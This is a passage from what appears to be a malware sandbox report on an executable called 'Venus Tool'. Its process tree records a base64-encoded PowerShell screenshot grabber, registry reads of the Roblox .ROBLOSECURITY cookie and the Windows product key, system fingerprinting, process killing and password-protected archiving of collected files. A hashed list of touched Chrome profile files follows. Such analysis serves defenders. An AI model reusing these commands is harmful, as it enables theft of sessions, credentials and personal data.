                                                                                                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                            4⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:628
                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ugkl0rze\ugkl0rze.cmdline"
                                                                                                              5⤵
                                                                                                                PID:6212
                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF1C.tmp" "c:\Users\Admin\AppData\Local\Temp\ugkl0rze\CSC1322CA4460A849FCBC298E29DF2B2FFA.TMP"
                                                                                                                  6⤵
                                                                                                                    PID:2440
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                              3⤵
                                                                                                                PID:5440
                                                                                                                • C:\Windows\system32\tree.com
                                                                                                                  tree /A /F
                                                                                                                  4⤵
                                                                                                                    PID:3440
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                  3⤵
                                                                                                                    PID:2736
                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                      tree /A /F
                                                                                                                      4⤵
                                                                                                                        PID:6216
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                      3⤵
                                                                                                                        PID:6248
                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                          tree /A /F
                                                                                                                          4⤵
                                                                                                                            PID:5972
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                          3⤵
                                                                                                                            PID:6040
                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                              tree /A /F
                                                                                                                              4⤵
                                                                                                                                PID:5460
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                              3⤵
                                                                                                                                PID:5580
                                                                                                                                • C:\Windows\system32\tree.com
                                                                                                                                  tree /A /F
                                                                                                                                  4⤵
                                                                                                                                    PID:1712
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3764"
                                                                                                                                  3⤵
                                                                                                                                    PID:6812
                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                      taskkill /F /PID 3764
                                                                                                                                      4⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:3728
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 436"
                                                                                                                                    3⤵
                                                                                                                                      PID:2712
                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                        taskkill /F /PID 436
                                                                                                                                        4⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:6552
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3204"
                                                                                                                                      3⤵
                                                                                                                                        PID:6484
                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                          taskkill /F /PID 3204
                                                                                                                                          4⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:964
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3288"
                                                                                                                                        3⤵
                                                                                                                                          PID:6852
                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                            taskkill /F /PID 3288
                                                                                                                                            4⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:6872
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 216"
                                                                                                                                          3⤵
                                                                                                                                            PID:7036
                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                              taskkill /F /PID 216
                                                                                                                                              4⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:1348
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2896"
                                                                                                                                            3⤵
                                                                                                                                              PID:6648
                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                taskkill /F /PID 2896
                                                                                                                                                4⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:4180
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                              3⤵
                                                                                                                                                PID:3564
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                  4⤵
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:4932
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                3⤵
                                                                                                                                                  PID:2324
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                    4⤵
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:3916
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI52242\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\COMLC.zip" *"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:6268
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI52242\rar.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI52242\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\COMLC.zip" *
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:2732
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1772
                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                        wmic os get Caption
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1064
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4800
                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                            wmic computersystem get totalphysicalmemory
                                                                                                                                                            4⤵
                                                                                                                                                              PID:6368
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5772
                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                wmic csproduct get uuid
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5844
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2452
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:5972
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2272
                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                      wmic path win32_VideoController get name
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Detects videocard installed
                                                                                                                                                                      PID:2964
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3696
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:3688
                                                                                                                                                                • C:\Users\Admin\Downloads\Venus Tool\v.exe
                                                                                                                                                                  "C:\Users\Admin\Downloads\Venus Tool\v.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1776
                                                                                                                                                                    • C:\Users\Admin\Downloads\Venus Tool\v.exe
                                                                                                                                                                      "C:\Users\Admin\Downloads\Venus Tool\v.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      PID:6832
                                                                                                                                                                  • C:\Users\Admin\Downloads\Venus Tool\v.exe
                                                                                                                                                                    "C:\Users\Admin\Downloads\Venus Tool\v.exe"
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3464
                                                                                                                                                                      • C:\Users\Admin\Downloads\Venus Tool\v.exe
                                                                                                                                                                        "C:\Users\Admin\Downloads\Venus Tool\v.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        PID:1448

                                                                                                                                                                    Network

                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                    Replay Monitor

                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                    Downloads

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002d
                                                                                                                                                                      Filesize

                                                                                                                                                                      64KB

                                                                                                                                                                      MD5

                                                                                                                                                                      34d417511bcc66045487a4307a08579d

                                                                                                                                                                      SHA1

                                                                                                                                                                      e2161accac890a2632bd6eaa7faaefc204cff6a1

                                                                                                                                                                      SHA256

                                                                                                                                                                      fcf96f427eebab9ffb97cf4ece8a7f3b37f9756d211164112371ce5950b58e4a

                                                                                                                                                                      SHA512

                                                                                                                                                                      a626a957f521fe0cccaa14ff22f08a26a968a6dc6633f5020fc668d0807ea98bba450fe76d9dd867ddff207b324ea68e0fe4b0dd7c85e2dcf39cf307a86e18c4

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002e
                                                                                                                                                                      Filesize

                                                                                                                                                                      23KB

                                                                                                                                                                      MD5

                                                                                                                                                                      df14665f460474a948ef6f3ca958f319

                                                                                                                                                                      SHA1

                                                                                                                                                                      78acca6b4ca9499ba20a2341060e9e62d1365a0c

                                                                                                                                                                      SHA256

                                                                                                                                                                      e1351a972cfc2b3cee94b36da7a2d25d94e86166685a084a7f8fc1f3e578270e

                                                                                                                                                                      SHA512

                                                                                                                                                                      8a6bbf19d0a305b4617604e34491fea97b0d5d88b6bc7ed635daa1fd7c580fe5aaa799eaa298c949bf4cb69d8d415c0e823b6128476008e527c130a26cf59cc2

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index
                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      1da1bbf510ea67540106da78ff0fe64f

                                                                                                                                                                      SHA1

                                                                                                                                                                      4a170c7922902624a0a18599256f281fb1104470

                                                                                                                                                                      SHA256

                                                                                                                                                                      40c24af05b58e4e9acd1996dc5512ca71627332118b405e4db881ff61362f3ba

                                                                                                                                                                      SHA512

                                                                                                                                                                      c4fc339c55067fc78348a2410f258201704caf606a1bf0e761d910e0f3107548de64efe782a66070ca9bd21f23f224875d40648dba8fe74557f8c0411f872041

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
                                                                                                                                                                      Filesize

                                                                                                                                                                      264KB

                                                                                                                                                                      MD5

                                                                                                                                                                      44d4973adf7b474ffd7dbce9a4680df2

                                                                                                                                                                      SHA1

                                                                                                                                                                      3fc206da0dffa06817384b166d028a48a85887c0

                                                                                                                                                                      SHA256

                                                                                                                                                                      65edbd1d99b3cf8d5436f931f8dc6187d1bb391fbb0250b8752c877bf98440fb

                                                                                                                                                                      SHA512

                                                                                                                                                                      99c82d83515a6b4172db0d0c3cca2e5e3b71f814092e438c588aef82ab0a0c2d0090c4e5f0b8cf60723b1eb4ab61255777fef29d4d09f28da5f8863da3dd566d

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\CURRENT
                                                                                                                                                                      Filesize

                                                                                                                                                                      16B

                                                                                                                                                                      MD5

                                                                                                                                                                      46295cac801e5d4857d09837238a6394

                                                                                                                                                                      SHA1

                                                                                                                                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                      SHA256

                                                                                                                                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                      SHA512

                                                                                                                                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
                                                                                                                                                                      Filesize

                                                                                                                                                                      1KB

                                                                                                                                                                      MD5

                                                                                                                                                                      2157a6c42708e85713a4cb4f938f7788

                                                                                                                                                                      SHA1

                                                                                                                                                                      8224d481f07e8e6fa69657b34337dd9f6615e48c

                                                                                                                                                                      SHA256

                                                                                                                                                                      0039e3f0ae6fad783242344b9473493dd30f3af5a4263b2698ddf65b0a7a9df2

                                                                                                                                                                      SHA512

                                                                                                                                                                      f5fcaac7d0a29cb2c603fd06b670fd0aa13a545233e93f2b1f94a7bb2ce9fa9faeb15ae90703ad45b2bfd5a631c59dc701ddae85d15675c63b31d32ca2d95f00

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
                                                                                                                                                                      Filesize

                                                                                                                                                                      10KB

                                                                                                                                                                      MD5

                                                                                                                                                                      dc9e23268619220abef3966e9ceb7975

                                                                                                                                                                      SHA1

                                                                                                                                                                      56f1c52147452e89b33b03db7828d964319b2f23

                                                                                                                                                                      SHA256

                                                                                                                                                                      e1e18c144456efd5f8ebafd6b14a76a8a145e0f4b6d2ed0202cdcf68b4351bc9

                                                                                                                                                                      SHA512

                                                                                                                                                                      a77ee39f5298c0551274bcfa0cc440c4218d6396bf5e546de0d02338b7e6656992c4579041200818241e0718fee4e57fdb77fc1c003d044dc8a84419a003a73d

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                                                                                                                                      Filesize

                                                                                                                                                                      2B

                                                                                                                                                                      MD5

                                                                                                                                                                      d751713988987e9331980363e24189ce

                                                                                                                                                                      SHA1

                                                                                                                                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                      SHA256

                                                                                                                                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                      SHA512

                                                                                                                                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      356962e608ca892ab22a9cefb7bd3d88

                                                                                                                                                                      SHA1

                                                                                                                                                                      4614ae3af03267cae6522ad3ef0aa95f278b2322

                                                                                                                                                                      SHA256

                                                                                                                                                                      610685f281e1e8212f7b0945067a659e1893795b0929210c69c9b2335c995a80

                                                                                                                                                                      SHA512

                                                                                                                                                                      39ffd19279da34ff935fc70bba94c6c5db7691d1798c294eee99ce07a020bab7f27def406af8671accd0cef45c855d61f4c1f83601472ef6e80b0f18ca329d3e

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                                                                                                                                                      Filesize

                                                                                                                                                                      354B

                                                                                                                                                                      MD5

                                                                                                                                                                      6e69c10b21b45d6836ce3a260588cf44

                                                                                                                                                                      SHA1

                                                                                                                                                                      5ccb17eeebac8a5f1947f8b68a6f667c64145f72

                                                                                                                                                                      SHA256

                                                                                                                                                                      001f1149d8fdd49dd9efe2af4c8ac3cb392f45495567e08bba5281c1e5c53f8b

                                                                                                                                                                      SHA512

                                                                                                                                                                      5c7bbf63c7ed1f56036471ffa57e2ee3760548e298820de0c1dcef3340c0026669850858ce92017a230de57bf656b3029a7a52bebeb39872600ff8286c054db4

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                                                                                                                                                      Filesize

                                                                                                                                                                      685B

                                                                                                                                                                      MD5

                                                                                                                                                                      46f5d032868ea449256bc5fb9078a9ec

                                                                                                                                                                      SHA1

                                                                                                                                                                      5d33136c9499ed581290fc580f8eba8dec8cd5ca

                                                                                                                                                                      SHA256

                                                                                                                                                                      24972e0b02709010bca7dc43f467320ab7ef6396248dab473bea236b0253e4c5

                                                                                                                                                                      SHA512

                                                                                                                                                                      4fd2c85b2b9a006a1ec7b89320155f2867df5becd414e174b1d7b73272a8260015bac6503bfefc902d73958000b0ec592b6b0f7bb5265c0a50bdf53105c7fd0d

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      aa5646c4c33cf60ba63c1cef44f74c50

                                                                                                                                                                      SHA1

                                                                                                                                                                      e5550017e13ff8d83f991ec5385b804ccdf1716e

                                                                                                                                                                      SHA256

                                                                                                                                                                      9f8e6258bef66fe05b66a3d1262b37550cf090942edc94f96eea301246df0c92

                                                                                                                                                                      SHA512

                                                                                                                                                                      cceaa497b8a5e4f25ec764245bf719ff8b3d425d3bd6d4887c61007ba7157be64e863bea4f7fadb03490e72a2406e999aa50251056a47e0dfb3cd66ded7252c2

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                      Filesize

                                                                                                                                                                      7KB

                                                                                                                                                                      MD5

                                                                                                                                                                      0fb20a0acac84f4d3b0a81de5a04f2ba

                                                                                                                                                                      SHA1

                                                                                                                                                                      f23addc5ec57dc9d1ade763be99fe1b80e8636a2

                                                                                                                                                                      SHA256

                                                                                                                                                                      8b2a65cfc4c23741d6a4ae397dc4609ccf8f3ac14c49f3a75fcd2ad1349dbef9

                                                                                                                                                                      SHA512

                                                                                                                                                                      87c8e264c6b664f15797974649da50466a393fa9556ebbc1608bdc5928ea62149286b0c408e675e9948ba3580522b1772efa3b6e63537d40fdc6be9a38fdc5b9

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                      Filesize

                                                                                                                                                                      7KB

                                                                                                                                                                      MD5

                                                                                                                                                                      626974c028525f744092feb88fc3aa12

                                                                                                                                                                      SHA1

                                                                                                                                                                      d9715b65cb0c3edcbd939d3ffc8716e60252f2c8

                                                                                                                                                                      SHA256

                                                                                                                                                                      5de778baed39ddef71086b1f1ac563035ac66d271a7416f378cfee4faaad2fdb

                                                                                                                                                                      SHA512

                                                                                                                                                                      87dc33ed28600f9368ac2869af9ae8c89ff22e17cd30e38692084bbdedbdfcf4ef4e0b4628098c9d10912f6f3ac3230f7b83c10768c49a9e4d4d114a3d16b685

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                      Filesize

                                                                                                                                                                      8KB

                                                                                                                                                                      MD5

                                                                                                                                                                      ea0ad08235401d7867b98bca99cbad37

                                                                                                                                                                      SHA1

                                                                                                                                                                      6305238fbba65d721b0c20ac7d7c7ade15e52ec1

                                                                                                                                                                      SHA256

                                                                                                                                                                      4616f520dd67c51f96ff519984ee36a37848e278b9bb60a98d4936bc6aeb6566

                                                                                                                                                                      SHA512

                                                                                                                                                                      39dae66b003f2c8b6de27e5e0bc60eb3aebbfab83ac13e8a120e1c5385939f03c4161b1b2842ee9dd28c7b6941672cde45c892dfe5c9c66cbc4b6d4fa2d1790b

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                                      Filesize

                                                                                                                                                                      16KB

                                                                                                                                                                      MD5

                                                                                                                                                                      ae3503aa8388368a4b16845370e537e8

                                                                                                                                                                      SHA1

                                                                                                                                                                      d501ffc6798365cc5133d99b52ce4b5d1a0bfa28

                                                                                                                                                                      SHA256

                                                                                                                                                                      328d05228256f972b0c2d059a8cad5351608a1176efae28cdd061e0b8c75ad80

                                                                                                                                                                      SHA512

                                                                                                                                                                      0da9a8866a755a1076e628a6fcc2dae35919438e8a31b33ff044688080166f0d60d37ca77120ac2a2cd0313164d2a945c0ea885bac07c248498b8247829b6a48

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
                                                                                                                                                                      Filesize

                                                                                                                                                                      56B

                                                                                                                                                                      MD5

                                                                                                                                                                      94275bde03760c160b707ba8806ef545

                                                                                                                                                                      SHA1

